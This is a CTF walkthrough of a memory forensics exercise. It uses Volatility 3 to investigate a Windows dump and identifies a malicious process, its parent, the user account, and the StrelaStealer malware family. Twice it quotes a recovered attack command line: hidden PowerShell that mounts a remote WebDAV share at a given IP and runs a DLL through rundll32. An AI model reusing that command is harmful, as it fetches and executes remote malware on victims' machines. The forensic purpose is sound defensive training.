1. Lab preparation
Challenge: Blue team CTF Challenges | Reveal - CyberDefenders Walkthrough Category: Endpoint Forensics
Tactics: Defense Evasion, Discovery
Environment: Kali Linux running in VMware Workstation Pro 17 Tools Used, Volatility 3 (running in Docker)
Reference Materials:
- Volatility 3 – Windows | Cheatsheet (FR)
- The documentation for Volatility 3
- Official Reveal Walkthrough
2. Introduction of Volatility
2.1 How Volatility 3 Manages Memory Dumps
Volatility 3 begins by loading the memory dump and automatically identifying the operating system profile. This OS profile enables Volatility to interpret specific memory structures and data layouts unique to that OS version. The tool utilizes symbol tables as comprehensive maps of OS-specific data structures, which are crucial for accurately parsing memory layouts across different OS versions.
2.2 Historical Context and Evolution
Volatility3 represents a significant advancement from its predecessors, with version 1.0.0 released in February 2021. The transition to version 3 brought improved performance and stability, enhanced plugin architecture, better symbol table management, and more efficient memory analysis capabilities. The tool continues to evolve, with the latest version (2.11.0) released in January 2025, adding new plugins and improving analysis capabilities for modern systems and threats.
2.3 Role in Cybersecurity Industry
Volatility3 serves multiple critical roles in cybersecurity. In incident response, it enables rapid threat assessment, malware detection, and system compromise investigation. For digital forensics, it facilitates memory dump analysis, artifact recovery, and timeline reconstruction. In security research, it supports malware behavior analysis, system vulnerability assessment, and threat intelligence gathering.
2.4 Limitations
The tool has several technical constraints, including the requirement for valid memory dumps and correct OS profiles. It depends on symbol table availability and faces challenges with memory corruption handling and incomplete dump analysis. Complex memory structure interpretation can also present difficulties during analysis.
2.5 Memory Acquisition Methods
For Windows systems, memory acquisition is typically performed using tools like WinPMem, FTK Imager, or PowerShell scripts. Linux systems rely on tools such as LiME and AVML. Best practices include verifying dump integrity, documenting the acquisition process, and maintaining chain of custody to ensure the reliability of the analysis results.
3. Basic usage of Volatility on docker
sudo docker container run --entrypoint ash --interactive --tty --volume "$PWD:/lab-192-reveal" --workdir /lab-192-reveal sk4la/volatility3
Essential Flags
--interactive (-i)
: Keeps STDIN open even after container has detached--tty (-t)
: Allocates a pseudo-TTY, providing a proper terminal session-
--volume (-v) "$PWD:/lab-192-reveal"
: Mounts current directory inside containerMaps your current directory ($PWD) to /lab-192-reveal in the container
Allows sharing files between host and container
-
--workdir /lab-192-reveal
: Sets the working directory inside the containerEnsures you start in the mounted volume directory
Makes navigation more convenient
/lab-192-reveal $ volatility3 --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty --save-config volatile.mem.json windows.info
Essential Flags
--file 192-Reveal.dmp
: Specifies the memory dump file to analyze--log 192-Reveal.dmp.log
: Creates a detailed log file and capture all operations and potential warnings--renderer pretty
: Formats output in human-readable text--save-config volatile.mem.json
: Saves analysis configuration for future use, speeds up subsequent analysis by skipping structure detectionwindows.info
: It’s the Plugin currently used. Displays basic system information
Finding
The system under investigation is Windows 10, with the NT root directory at C:\Windows
and a memory capture timestamp of 2024-07-15 07:00:08. These details provide essential context, helping to refine the scope of our analysis and supporting the construction of an accurate timeline if needed.
4. Question
Q1. Identifying the name of the malicious process helps in understanding the nature of the attack. What is the name of the malicious process?
Based on this logic chain, I need to find malicious process in memory by using volatility3 plugin windows.malfind
My answer:
/lab-192-reveal $ volatility3 --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.malfind
Error
During the waiting period of output, I faced Segmentation fault (core dumped) so that I decide to install and use volatility3 latest version directly on my kali.
git clone https://github.com/volatilityfoundation/volatility3.git
Volatility 3 Framework 2.20.1
## The 192-Reveal.dmp file is located under current directory
─(kali㉿kali)-[~/Documents/volatility3]
python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.malfind
Q2. Knowing the parent process ID (PPID) of the malicious process aids in tracing the process hierarchy and understanding the attack flow. What is the parent PID of the malicious process?
(kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.pstree
Q3: Determining the file name used by the malware for executing the second-stage payload is crucial for identifying subsequent malicious activities. What is the file name that the malware uses to execute the second-stage payload?
kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.cmdline
3435.dll
Q4: Identifying the shared directory on the remote server helps trace the resources targeted by the attacker. What is the name of the shared directory being accessed on the remote server?
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
davwwwroot
Q5: What is the MITRE ATT&CK sub-technique ID that describes the execution of a second-stage payload using a Windows utility to run the malicious file?
Search Rundll32 on MITRE ATT&CK
Q6: Identifying the username under which the malicious process runs helps in assessing the compromised account and its potential impact. What is the username that the malicious process runs under?
(kali㉿kali)-[~/Documents/volatility3]
└─$ python3 vol.py --file 192-Reveal.dmp --log 192-Reveal.dmp.log --renderer pretty windows.getsids.GetSIDs | grep "3692"
elon is the username
Q7: Knowing the name of the malware family is essential for correlating the attack with known threats and developing appropriate defenses. What is the name of the malware family?
powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
This IPV4 is used by STRELASTEALER